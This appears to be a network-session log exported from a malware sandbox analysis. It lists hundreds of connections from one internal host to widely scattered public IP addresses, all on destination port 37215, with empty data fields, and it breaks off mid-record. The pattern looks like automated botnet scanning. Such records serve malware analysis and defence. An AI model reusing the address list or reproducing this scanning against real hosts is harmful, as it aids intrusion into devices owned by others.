                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22104192.168.2.1557334190.63.102.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22105192.168.2.1552242222.75.213.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22106192.168.2.154131041.187.94.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22107192.168.2.1539816122.6.87.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22108192.168.2.155124641.119.47.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22109192.168.2.153873294.104.226.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22110192.168.2.1540644122.33.231.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22111192.168.2.1537154157.57.37.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22112192.168.2.1545072186.125.47.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22113192.168.2.1546032121.160.199.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22114192.168.2.155347063.198.28.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22115192.168.2.154517431.206.35.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22116192.168.2.1545550102.154.105.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22117192.168.2.1540922122.37.4.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22118192.168.2.1548818122.121.91.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22119192.168.2.1540736186.11.213.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22120192.168.2.155141694.192.210.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22121192.168.2.1552704122.77.83.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22122192.168.2.1538118156.67.40.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22123192.168.2.1535042138.201.161.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22124192.168.2.1536512190.137.229.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22125192.168.2.155589245.91.201.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22126192.168.2.1534616181.165.60.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22127192.168.2.1552716121.244.36.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22128192.168.2.1536606156.3.80.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22129192.168.2.1554906197.39.86.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22130192.168.2.1545068181.247.76.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22131192.168.2.154199037.154.42.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22132192.168.2.1544090138.79.25.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22133192.168.2.1546030102.214.20.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22134192.168.2.1534590157.65.142.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22135192.168.2.154096445.179.41.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22136192.168.2.155724841.93.224.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22137192.168.2.153878045.76.193.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22138192.168.2.1536188138.120.225.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22139192.168.2.1549758222.26.135.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22140192.168.2.1542758186.135.222.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22141192.168.2.1541558122.104.173.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22142192.168.2.154478845.102.55.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22143192.168.2.1540604156.5.210.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22144192.168.2.1552304156.253.232.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22145192.168.2.155681094.199.131.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22146192.168.2.1558914181.92.9.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22147192.168.2.1559084181.101.210.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22148192.168.2.1541234197.35.148.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22149192.168.2.1543772121.244.29.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22150192.168.2.1559828121.185.227.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22151192.168.2.1543696156.195.21.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22152192.168.2.1537162102.205.96.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22153192.168.2.1540292138.183.155.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22154192.168.2.155932431.47.117.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22155192.168.2.154393231.251.101.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22156192.168.2.1550770138.7.66.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22157192.168.2.1550176102.162.12.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22158192.168.2.1548310157.80.57.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22159192.168.2.1559068190.119.32.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22160192.168.2.1546862222.52.47.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22161192.168.2.154889894.103.132.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22162192.168.2.1542158121.0.112.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22163192.168.2.1535358122.213.160.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22164192.168.2.1541462186.63.220.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22165192.168.2.1556680138.180.216.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22166192.168.2.154601037.171.35.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22167192.168.2.1549018197.181.147.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22168192.168.2.1558638122.153.185.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22169192.168.2.155936437.159.80.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22170192.168.2.1553072222.156.156.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22171192.168.2.1538080156.136.192.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22172192.168.2.155019641.188.40.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22173192.168.2.155861241.46.211.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22174192.168.2.1557848190.201.246.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22175192.168.2.155349437.5.102.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22176192.168.2.1539464157.249.203.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22177192.168.2.1556552138.216.250.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22178192.168.2.155561294.41.20.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22179192.168.2.155958037.216.231.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22180192.168.2.1545784190.89.1.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22181192.168.2.1552376197.25.164.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22182192.168.2.153327631.28.188.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22183192.168.2.1549774200.48.245.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22184192.168.2.155140494.7.23.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22185192.168.2.1553180222.22.189.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22186192.168.2.1536242102.38.44.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22187192.168.2.1554874156.211.94.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22188192.168.2.1553276157.222.187.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22189192.168.2.1534450181.152.152.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22190192.168.2.1538646181.209.215.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22191192.168.2.153876894.249.86.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22192192.168.2.1556654181.35.207.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22193192.168.2.1551986222.117.68.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22194192.168.2.1538714156.205.90.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22195192.168.2.1543212121.114.157.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22196192.168.2.1538570190.26.70.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22197192.168.2.1541162176.2.209.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22198192.168.2.1555072181.92.166.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22199192.168.2.155631831.65.246.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22200192.168.2.155727237.44.179.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22201192.168.2.1534632138.33.90.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22202192.168.2.1540388156.117.243.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22203192.168.2.154007094.77.8.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22204192.168.2.1554596186.184.246.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22205192.168.2.1546510186.31.55.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22206192.168.2.1555446181.24.12.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22207192.168.2.1555938190.61.37.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22208192.168.2.154095457.50.135.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22209192.168.2.153398445.121.101.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22210192.168.2.155781894.123.224.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22211192.168.2.1532860138.78.169.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22212192.168.2.1554574197.246.84.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22213192.168.2.1555130138.86.224.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22214192.168.2.1552702186.69.129.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22215192.168.2.153328645.82.83.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22216192.168.2.154249441.31.103.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22217192.168.2.1539708186.84.2.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22218192.168.2.153995045.40.209.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22219192.168.2.1550126102.240.108.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22220192.168.2.1555552156.50.179.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22221192.168.2.154123494.159.226.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22222192.168.2.1543960102.176.149.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22223192.168.2.154127094.108.21.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22224192.168.2.153389437.39.152.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22225192.168.2.1554980138.117.110.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22226192.168.2.1535880102.45.232.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22227192.168.2.1546378181.249.201.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22228192.168.2.1536344138.227.59.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22229192.168.2.1533966190.178.167.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22230192.168.2.1536504181.96.22.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22231192.168.2.153478641.240.122.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22232192.168.2.153997445.189.234.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22233192.168.2.1552386156.231.32.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22234192.168.2.1552192138.198.25.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22235192.168.2.154428837.128.33.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22236192.168.2.1546880102.27.132.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22237192.168.2.1545188156.93.3.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22238192.168.2.1549998181.180.40.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22239192.168.2.1533930138.199.228.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22240192.168.2.1534162222.48.238.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22241192.168.2.155770645.100.22.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22242192.168.2.153507041.0.163.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22243192.168.2.1546804197.217.216.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22244192.168.2.155864694.74.108.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22245192.168.2.155461694.101.170.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22246192.168.2.1536538156.119.245.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22247192.168.2.1543732156.56.206.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22248192.168.2.1552592122.164.217.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22249192.168.2.154676494.28.116.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22250192.168.2.1538668186.116.223.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22251192.168.2.1558068197.39.84.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22252192.168.2.1543694157.122.48.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22253192.168.2.1539516156.223.197.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22254192.168.2.1552894102.150.163.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22255192.168.2.153485041.27.29.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22256192.168.2.1549548121.94.99.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22257192.168.2.153299841.240.199.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22258192.168.2.1545666181.119.29.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22259192.168.2.1549228197.169.130.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22260192.168.2.155811294.147.250.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22261192.168.2.1539168222.103.56.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22262192.168.2.1542924222.91.255.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22263192.168.2.1538736121.219.134.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22264192.168.2.155773441.2.250.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22265192.168.2.1556840156.128.250.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22266192.168.2.155701637.103.142.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22267192.168.2.1541388190.34.238.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22268192.168.2.155925045.255.253.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22269192.168.2.1534450222.113.52.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22270192.168.2.1559590121.169.248.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22271192.168.2.1556078122.234.60.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22272192.168.2.1558454156.146.236.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22273192.168.2.1545984222.5.183.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22274192.168.2.154562437.56.59.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22275192.168.2.155295031.133.171.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22276192.168.2.1560094102.121.147.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22277192.168.2.1542922197.65.250.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22278192.168.2.154178837.15.81.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22279192.168.2.15416269.146.35.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22280192.168.2.1536342181.101.172.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22281192.168.2.1559998121.73.157.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22282192.168.2.1550000150.29.83.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22283192.168.2.1542072190.147.181.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22284192.168.2.1537644222.248.138.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22285192.168.2.153986441.112.20.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22286192.168.2.1538102181.190.67.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22287192.168.2.1545004190.81.162.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22288192.168.2.1541154222.48.48.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22289192.168.2.1556598156.120.1.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22290192.168.2.1554670157.134.242.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22291192.168.2.155535037.58.100.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22292192.168.2.154249294.226.198.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22293192.168.2.1549174190.107.50.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22294192.168.2.1550314121.27.101.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22295192.168.2.1557032138.205.43.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22296192.168.2.1553190197.7.144.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22297192.168.2.1533092122.167.122.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22298192.168.2.1552352121.189.41.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22299192.168.2.1560638197.33.226.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22300192.168.2.1551302102.42.56.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22301192.168.2.1556904186.125.19.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22302192.168.2.1546402138.202.130.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22303192.168.2.1557498138.112.154.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22304192.168.2.1539318156.60.178.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22305192.168.2.1536078121.25.202.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22306192.168.2.154192631.211.106.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22307192.168.2.1544332190.188.169.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22308192.168.2.1549034222.80.50.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22309192.168.2.1554464157.249.148.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22310192.168.2.1552018102.207.211.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22311192.168.2.1559466113.131.160.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22312192.168.2.154485037.34.176.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22313192.168.2.1543036222.213.77.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22314192.168.2.154535631.74.178.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22315192.168.2.1550794156.168.34.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22316192.168.2.153300494.87.59.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22317192.168.2.154043231.0.145.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22318192.168.2.1548634121.110.215.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22319192.168.2.156099694.102.60.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22320192.168.2.1546904181.105.113.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22321192.168.2.1538868181.229.211.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
